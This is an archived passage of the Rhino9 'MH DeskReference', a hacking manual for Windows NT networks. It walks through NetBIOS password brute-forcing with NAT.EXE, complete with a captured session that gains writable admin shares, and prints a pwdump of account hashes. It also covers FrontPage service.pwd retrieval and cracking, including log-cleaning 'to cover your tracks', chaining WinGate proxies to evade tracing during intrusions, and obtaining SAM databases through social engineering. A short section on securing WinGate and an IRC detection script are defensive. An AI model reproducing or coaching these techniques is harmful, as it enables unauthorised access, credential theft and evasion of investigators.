WordType Designs
™
Driven To Distractions
©
The Sound of One Hand Clapping
©
[HOME]
A rchive Date
[
21-04-2001
]
Category
[
Information Technologies
]
sub-Categoy
[
Microsoft
]
[
http://www.infosyssec.org/infosyssec/TheMHD.html
The MH DeskReference
Version 1.2
Written/Assembled by
The Rhino9 Team
[8.0.0] NetBIOS Attack Methods
This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, it switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
Switches:
-o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output.
-u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server.
Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server.
Passwords should appear one per line in the specified file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifications include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1
All combinations of hostnames and address ranges as specified above are valid.
[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT
First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.
What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.
C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master browser for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client
[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:
[8.0.4] Net Accounts
: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer
: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation
: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.
[8.0.7] Net Continue
: Reactivates an NT service that was suspended by a NET PAUSE command.
[8.0.8] Net File
: This command lists the open files on a server and has options for closing shared files and removing file locks.
[8.0.9] Net Group
: This displays information about group names and has options you can use to add or modify global groups on servers.
[8.1.0] Net Help
: Help with these commands
[8.1.1] Net Helpmsg
message
#
: Get help with a particular net error or function message.
[8.1.2] Net Localgroup
: Use this to list local groups on servers. You can also modify those groups.
[8.1.3] Net Name
: This command shows the names of computers and users to which messages are sent on the computer.
[8.1.4] Net Pause
: Use this command to suspend a certain NT service.
[8.1.5] Net Print
: Displays print jobs and shared queues.
[8.1.6] Net Send
: Use this command to send messages to other users, computers, or messaging names on the network.
[8.1.7] Net Session
: Shows information about current sessions. Also has commands for disconnecting certain sessions.
[8.1.8] Net Share
: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation
: Shows the statistics log.
[8.2.0] Net Stop
: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.
[8.2.1] Net Time
: This command is used to display or set the time for a computer or domain.
[8.2.2] Net Use
: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.
[8.2.3] Net User
: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.
[8.2.4] Net View
: This command displays a list of resources being shared on a computer. Including netware servers.
[8.2.5] Special note on DOS and older Windows Machines
: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
For this section, the command being used is the NET VIEW and NET USE commands.
[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
[9.0.0] Frontpage Extension Attacks
Ofcourse, everyone should know what Microsoft Frontpage is. The server extensions are installed server side to provide added functionality for frontpage web authors. These extensions function as "web bots" if you will, giving web authors that use frontpage easy access to complex web and HTML functions. Soon after the extensions came into wide use, security concerns began to pop-up. Most of these security concerns were very basic, the collection presented below are PROVEN methods that have been tested repeatedly in several types of configurations.
[9.0.1] For the tech geeks, we give you an actual PWDUMP
This is the pwdump from the webserver the Lan Manager password is set to "password". This PWDUMP example is for those of you that have heard about the utility but may have never actually seen the output of one. This dump was used by Vacuum of rhino9 during his journey into cracking the NT encryption algorithm.
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
[9.0.2] The haccess.ctl file
The hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the haccess.ctl file is given below:
The #haccess.ctl file:
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows frontpage server extensions to be installed on port 443 (HTTPS)Secure Sockets Layer port 80 (HTTP)
NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used instead of Frontpage.
The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (
www.target.com
)
C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
If Index Information Server is running under Internet Information Server:
service.pwd (or any other file) can sometimes be retrieved.
search for
"#filename=*.pwd"
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
C:\InetPub\ftproot The default location for the ftp
The ftp service by default runs on the standard port 21.
Check to see if anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on using this user name and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server’s Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If changed, the password, you must change it in both places and make sure it matches.
NOTE: Name and password are case sensitive
Scanning PORT 80 (http) or 443 (https) options:
GET /__vti_inf.html #Ensures that frontpage server extensions are installed.
GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks
GET /samples/search/queryhit.htm
If service.pwd is obtained it will look similar to this:
Vacuum:SGXJVl6OJ9zkE
The above password is apple
Turn it into DES format:
Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
[9.0.3] Side note on using John the Ripper
The run your favorite unix password cracker like John The Ripper
Usage: JOHN [flags] [-stdin|-w:wordfile] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s) (wildcards allowed)
-wordfile:<file> specify wordlist file
-restore[:<file>] restore session [from <file>]
-user:login|uid[,..] only crack this (these) user(s)
-timeout:<time> abort session after a period of <time> minutes
-incremental[:<mode>] incremental mode [using JOHN.INI entry <mode>]
-single single crack mode
-stdin read words from stdin
-list list each word
-test perform a benchmark
-beep beep when a password is found
-quiet do not beep when a password is found (default)
-noname don't use memory for login names
Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.alstavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
To open a FrontPage web
On the FrontPage Explorer’s File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage
Web and choose the FrontPage web you want to open.
Click More Webs if the web you want to open is not listed.
Click OK.
If you are prompted for your author name and password, you will have
to decrypt service.pwd, guess or move on.
Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.
[10.0.0] WinGate
There have been a few papers about WinGate. Some have explained how to bounce through its port 23 telnet proxy. Some have explained how to secure it. In this section we will show you how to use WinGate for its good and bad and you will learn from the good and bad examples. People in the past have said there are flaws and exploits to WinGates and this is wrong. There are system admins that poorly configure their systems but it is not WinGate itself that is the flaw.
[10.0.1] What Is WinGate?
WinGate is basically a program that lets you split a connection. Ex: You can share 1 modem with 2 computers. WinGate comes with several proxies and that is where the possible threat lies. (This sharing of internet connection is known as Connection Aggregation)
Note: We will only talk about 3 of the more used proxy portions of WinGate.
[10.0.2] Defaults After Install
When you do a regular install of WinGate without changing things there are a few defaults:
Port: | Service:
23 Telnet Proxy Server - This is default and running right after install.
1080 SOCKS Server - This once setup via GateKeeper has no password until you set one.
6667 IRC Mapping - This once setup via GateKeeper has no password until you set one.
The biggest threat to your server is the port 23 telnet proxy.
[10.0.3] Port 23 Telnet Proxy
This proxy is setup and run as soon as you are done installing and to make things worse it has no password after install and doesn’t ask you for one. Most system admins dont even know this and dont even think to try to password it and that is where the problem arises.
The telnet proxy is quiet simple. You telnet to port 23 on the server that is running the WinGate telnet proxy and you get a prompt WinGate> At this prompt you type in the server then a space and the port you want to connect to.
Example:
telnet wingate.net
Connected to wingate.net
WinGate> victim.com 23
What this example shows is someone telnetting to the WinGate server and then from that WinGate server telnet out of it to victim.com so on victim.com's logs it will show the wingate IP (wingate.net) and therefore the person telnetting keeps her IP a secret.
[10.0.4] Port 1080 SOCKS Proxy
The socks proxy is not installed by default but as soon as you use GateKeeper to install it. It installs with no password, unless you set one. If you are familiar with socks you know that there are many things you could do with it.
[10.0.5] Port 6667 IRC Proxy
The irc proxy is like how we would do a wingate telnet proxy bounce to an irc server except the irc proxy is set to goto a certain server already. This is not set to run after install but after you do install it it setups with no password, unless you set one.
[10.0.6] How Do I Find and Use a WinGate?
Finding WinGates are relatively easy to do. If you would like to find static IP WinGates (IP never changes) go to yahoo or something of the such and search for cable modems. The reason for searching for cable modems is because a lot of people with cable modems have WinGate so that they can split there cable modems large bandwidth and share it with the other computers in there house. One large cable modem company is Cox Cable. Their webpage can be found at
www.home.com
. The Cox Cable rang of IP's are: 24.1.X.X where depending on what number X equals is where in the country the cable modem is located. You can also use Port or Domain scanners and scan for Port 1080, which Identifies a SOCKS Proxy, this is also an easy way to find a WinGate.
Example:
24.1.67.1 Resolves to c224084-a.frmt1.sfba.home.com which from that we know the abreveation sfba = San Fransico Bay Area or something close to that.
That is how to find static IP WinGates. To find dynamic IP (IP's that change every time a user logs on to the internet) WinGates it is not to hard at all. Almost every ISP big and small has users with WinGate. You need to either know the format of an ISP's dynamic ppp addresses or you need to get on IRC (Internet Relay Chat) and see what they are that way. Say that you already have a ppp IP of armory-us832.javanet.com. Now you dns that IP and get 209.94.151.143 now you take the IP address and stick it into a domain scanner program. Ex: Domscan which can be found on the Rhino9 web site (rhino9.abyss.com) Ok so you have domscan now. Run domscan and there is a box where you put in the IP address and the port to scan for. The WinGate telnet proxy by default runs on port 23. So we put in 209.94.151.143 in the first box in the domscan program and then 23 in the second box and then click start. The results we will get are:
209.94.151.2
209.94.151.4
209.94.151.6
209.94.151.10
209.94.151.8
209.94.151.73
209.94.151.118
209.94.151.132
Now we have to check each of these IP's for the WinGate prompt. So to do that we need to telnet to 209.94.151.2 on port 23 and if it shows WinGate> right when we connect then it is a WinGate. If not we go to the next address which in this case would be 209.94.151.4. We would do that for the whole list of IP's.
Note: If we are scanning for dynamic IP WinGates it is more common that the last number of the IP of the WinGate will be higher. Ex: There is a better chance that 209.94.151.132 is a WinGate and that 209.94.151.2 is not a WinGate.
[10.0.7] I have found a WinGate telnet proxy now what?
Well there are many uses for WinGate. The first use and probably the greatest is the WinGate bounce technique. Say you are going to hack the pentagon. You can use the WinGate technique to keep yourself from having a jail sentence with spike. Here is how it works. We get a collection of WinGate IP's. First we open our telnet program and telnet to the first WinGate on our list. We get the WinGate> prompt and at that prompt we type the second WinGate on our list then a space then 23 then hit enter. Then we get another WinGate prompt and at that prompt we type the third WinGate IP on our list then a space then 23 then enter and so on and so fourth until we have bounced through about 10 or so WinGates then on the tenth WinGate we enter in the pentagon addresss. Ex: WinGate>
www.pentagon-ai.army.gov
23 and then hit enter and start hacking away at it. So you ask, well cant they just trace back through all the WinGates? They could try to trace it back and here is how it would work. The pentagon has an IP on there logs, the ip is 2.2.2.2. The pentagon know that IP belongs to the an internet service provider called interlink. So the pentagon calls interlink and then tells them that at 3:43am on sunday an ip address of 2.2.2.2 hacked into there computer system. So the ISP (internet service provider) checks there logs and sees that there user John Doe was on at that time with that IP on sunday. So the pentagon has the swat team do a raid on John Doe's house and find nothing. Now it could end right here or the pentagon will maybe see that John Doe has WinGate and then check his logs. Now most people with WinGate dont even log so the pentagon could be stumped right there once again or they might see that another IP went through that WinGate and then they will have to repeat the process of calling the ISP and repeat that whole process again. Now if we went through 10 WinGate IP's you know that somewhere in that 10 either the ISP or the WinGate user wont know what IP was going through them, in otherwords if you bounce through 10 WinGate IP's you are a ghost, thy samurai... That is one use of WinGate's telnet proxy. Note: you might need to do a control + enter at the WinGate> prompt, it differs between telnet clients. Another use can be for IRC spoofing. To do this we take a WinGate ip and in our irc client we connect to that WinGate IP. This is an example of how it would look in mIRC for Windows. Do these commands:
1. /server wingate.net
It then connects.
2. /quote irc.irc.net 6667
It then connects to the irc server.
3. /quote user whatever whatever whatever@server.com whatever
4. /quote nick whatever
This sends the irc client info. Read the irc rfc for more info on that.
Once we have done /quote nick whatever mirc will be totally connected and we can then do whatever we want and our IP on IRC will be wingate.net or whatever the wingate IP is. So think about it and I am sure you can think of a few fun things to do with someone elses IP. Note: For you people that choose to abuse this. I have already coded an anti-wingate script for IRC to detect you mean people that choose to abuse this.
Those are 2 of the more common things to do with WinGate telnet proxies.
[10.0.8] Securing the Proxys
Service That Need To Be Locked To Stop Bouncing
23 - Telnet Proxy Server
1080 - SOCKS Server
6667 - IRC Mapping
All Ports Can Be Locked The Same Way
1- Load Gatekeeper
2- Logon To Wingate Server As Administrator
3- Select Service To Lock
4- Right Click And Pick Properties
5- Option One Of Lock Down Is Click "Bind to specific interface" and put 127.0.0.1 in the box
6- Other Way To Lock Down A Service Is Select Policies, Double Click on "Everyone Unrestricted Rights", Click on Location Tab, Click on "Specify locations from where this recipient has rights" next you will be entering the IP(s) you what to give access to this service (Add 127.0.0.1 so the local box has access) you can add by each IP or by groups of IPs like 199.170.0. *
Some Other Notes Guest Account Has No Password and Enable on Install Basic Install Let's EVERONE have access to bounce from your system. All ports but the "remote control service" is unlocked and everyone has access, you should turn off any services you do not have a need for by double clicking on the service and unchecking the "Accept connections on port"
[10.0.9] mIRC 5.x WinGate Detection Script
Note: This is script will kick/ban anyone running WinGate.
alias telnet .msg $me $chr(1) $+ DCC CHAT CHAT $longip($$1) $$2 $+ $chr(1)
alias removenickcheck unset %lastjoined $nick
alias gatekick {
set %nick $$1
set %chan 0
:loop2
inc %chan 1
if (%nick ison $chan(%chan)) {
mode $chan(%chan) -o %nick
ban $chan(%chan) %nick 2
kick $chan(%chan) %nick -=_Wingate Spoof_=-
goto loop2
}
if ($chan(%chan) == $null) { goto end2 }
goto loop2
:end2
unset %nick
}
#spoofcheck on
on 1:JOIN:%protchans:set %gatenick $nick | set %lastjoined $nick | timer 1 3 removenickcheck | write $mircdirips.txt %gatenick --> $site <-- [ $time, $date ] | dns $nick
on 1:DNS:echo -a _DNS ON [ $+ $nick $+ ]] | echo -a _IP address: $iaddress | echo -a _Name address: $naddress | set %gateip $iaddress | set %gatename $naddress | telnet %gateip 23 | timer66 1 15 close -c
on 1:CHATOPEN:msg =$nick gatecheck | timer66 1 15 close -c
on 1:CHAT:*WinGate>*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
on 1:CHAT:*many*:gatekick %gatenick | write $mircdirgate.txt %gatename = %gateip
#spoofcheck end
#gateslip on
on 1:NICK:{
if ($nick == %lastjoined) && ($nick != $me) {
echo 4 -a (-=_GateSlip Check_=-)
kick %protchans $newnick -=_GateSlip_=-
removenickcheck
}
}
#gateslip end
[10.1.0] Conclusion
WinGate is just another example of a program that is good but it doesnt warn the system admins and as we all know the common system admin doesnt read much just installs thinking it is secure. Software programmers need to either make their programs default to a tight security or at least as the program is install they need it to warn the system admin of possible miss configurations. Wether it is Microsoft products or this simple WinGate remember one thing, the software developer makes the software work they rarely ever warn you on miss configurations. Yes people do put out patches for true exploits etc... but where are the papers on miss configurations? Where are the warnings of things you might do that you should? If I was one of the WinGate programmers I would prompt the user while WinGate is installing and tell them of different security risks they may face. Hope that this paper has helped and that we, Rhino9, have helped.
[11.0.0] What a security person should know about WinNT
The basis for this portion of the book was gleaned from simple nomads FAQ, much Props to him.
[11.0.1] NT Network structures (Standalone/WorkGroups/Domains)
Each NT workstation participates in either a workgroup or a domain. Most companies will have NT workstations participate in a domain for management of the resource by the administrator.
A domain is one or more servers running NT server with all of the servers functioning as a single system. The domain not only contains servers, but NT workstations, Windows for Workgroups machines, and even LAN Manager 2.x machines. The user and group database covers ALL of the resources of a domain.
Domains can be linked together via trusted domains. The advantage of trusted domains is that a user only needs one user account and password to get to resources across multiple domains, and administrators can centrally manage the resources.
A workgroup is simply a grouping of workstations that do not belong to a domain. A standalone NT workstation is a special case workgroup.
User and group accounts are handled differently between domain and workgroup situations. User accounts can be defined on a local or domain level. A local user account can only logon to that local computer, while a domain account can logon from any workstation in the domain.
Global group accounts are defined at a domain level. A global group account is an easy way to grant access to a subset of users in a domain to, say, a single directory or file located on a particular server within the domain. Local group accounts are defined on each computer. A local group account can have global group accounts and user accounts as members.
In a domain, the user and group database is "shared" by the servers. NT workstations in the domain DO NOT have a copy of the user and group database, but can access the database. In a workgroup, each computer in the workgroup has its own database, and does not share this information.
[11.0.2] How does the authentication of a user actually work?
First, a user logs on. When this happens, NT creates a token object that represents that user. Each process the user runs is associated with this token (or a copy of it). The token-process combination is refered to as a subject. As subjects access objects such as files and directories, NT checks the subject's token with the Access Control List (ACL) of the object and determines whether to allow the access or not. This may also generate an audit message.
[11.0.3] A word on NT Challenge and Response
When a user logs on, more than likely they will be using Windows NT Challenge and Response. When using this type of password encryption, the password never actually crosses the wire. A null or random set of characters is generated at the client machine. Those characters are encrypted using the users password. That encrypted information is then sent across the wire. The server then uses what it has stored in its database as the users password to un-encrypt the sent data. If the un-encryption works, it knows that the user typed in the correct password client side.
[11.0.4] Default NT user groups
There are a number of built-in local groups in NT that can do various functions, some which would be better off being left to the Administrator. Administrators can do everything, but the following groups' members can do a few extra items (I only verified this on 4.0):
- Server Operators: do a shutdown, even remotely; reset the system time; perform backups and restores.
- Backup Operators: do a shutdown; perform backups and restores.
- Account Operators: do a shutdown.
- Print Operators: do a shutdown.
Also members of these groups can login at the console. As you explore this book and possibly someone else's server, remember these permissions. Gaining a Server Operator account and placing a trojan that activates after a remote shutdown could get you Administrator.
[11.0.5] Default directory permissions
I only verified these on 4.0. And remember, Administrators are deities. Otherwise, if it isn't here, the group doesn't have access.
\ (root), \SYSTEM32, \WIN32APP - Server Operators and Everyone can read and execute files, display permissions on files, and do some changing on file attributes.
\SYSTEM32\CONFIG - Everyone can list filenames in this directory.
\SYSTEM32\DRIVERS, \SYSTEM\REPL - Server Operators have full access, Everyone has read access.
\SYSTEM32\SPOOL - Server Operators and Print Operator have full access, Everyone has read access.
\SYSTEM32\REPL\EXPORT - Server Operators can read and execute files, display permissions on files, and do some changing on file attributes. Replicator has read access.
\SYSTEM32\REPL\IMPORT - Server Operators and Replicator can read and execute files, display permissions on files, and do some changing on file attributes. Everyone has read access.
\USERS - Account Operators can read, write, delete, and execute. Everyone can list filenames in this directory.
\USERS\DEFAULT - Everyone has read, write, and execute.
[11.0.6] Common NT accounts and passwords
There are two accounts that come with NT out of the box – administrator and guest. In a network environment, I have run into local administrator access unpassworded, since the Sys Admin thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to
an NT box by using its local administrator account with no password.
Guest is another common unpassworded account, although recent shipments of NT disable the account by default. While it is possible that some companies will delete the guest account, some applications require it. If Microsoft Internet Studio needs to access data on another system, it
will use guest for that remote access.
[11.0.7] How do I get the admin account name?
It is possible that a Sys Admin will create a new account, give that account the same access as an administrator, and then remove part of the access to the administrator account. The idea here is that if you don't know the administrator account name, you can't get in as an administrator.
Typing "NBTSTAT -A ipaddress" will give you the new administrator account (generally tagged as a 2 digit 03 code), assuming they are logged in. A bit of social engineering could get them to log in as well. nbtstat will also give you other useful information such as services running, the NT domain name, the nodename, and the ethernet hardware address.
[11.0.8] Accessing the password file in NT
The location of what you need is in \\WINNT\SYSTEM32\CONFIG\SAM which is the location of the security database. This is usually world readable by default, but locked since it is in use by system compotents. It is possible that there are SAM.SAV files which could be readable. If so, these could be obtained for the purpose of getting password info.
During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it was just installed, only the Administrator and Guest accounts will be there, but maybe Administrator is enough -- especially if the Administrator password is not changed after installation.
If the Sys Admin updates their repair disks, or you get a hold of a copy of the repair disks, you can get password database.
If you are insane, you can go poking around in the SAM secret keys. First, schedule service to logon as LocalSystem and allow it to interact with the desktop, and then schedule an interactive regedt32 session. The regedt32 session will be running as LocalSystem and you can play around in the secret keys. However, if you change some stuff this might be very bad. You have to be Administrator to do this, though, so for the hacker you need to walk up to the machine while the Administrator is logged in and distract them by telling them they're giving away Microsoft t-shirts in the lobby (this doesn't always work ;-).
[11.0.9] Cracking the NT passwords
First off, it should be explained that the passwords are technically not located on the server, or in the password database. What IS located there is a one-way hash of the password. Let me explain...
Two one-way hashes are stored on the server -- a Lan Manager password, and a Windows NT password. Lan Manager uses a 14 byte password. If the password is less than 14 bytes, it is concantenated with 0's. It is converted to upper case, and split into 7 byte halves. An 8 byte odd parity DES key is constructed from each 7 byte half. Each 8 byte DES key is encrypted with a
"magic number" (0x4B47532140232425 encrypted with a key of all 1's). The results of the magic number encryption are concantenated into a 16 byte one way hash value. This value is the Lan Manager "password".
A regular Windows NT password is derived by converting the user's password to Unicode, and using MD4 to get a 16 byte value. This hash value is the NT "password".
So to crack NT passwords, the username and the corresponding one way hashes (Lan Man and NT) need to be extracted from the password database. Instead of going out and writing some code to do this, simply get a copy of Jeremy Allison's PWDUMP, which goes through SAM and gets the information for you.
PWDUMP does require that you are an Administrator to get stuff out of the registry, but if you can get ahold of copies of the security database from another location you can use those. For actually cracking the password, I recommend using L0phtcrack.
[11.1.0] What is ‘last login time’?
Let's say an admin is checking the last time certain users have logged in by doing a NET USER <userid> /DOMAIN. Is the info accurate? Most of the time it will NOT be.
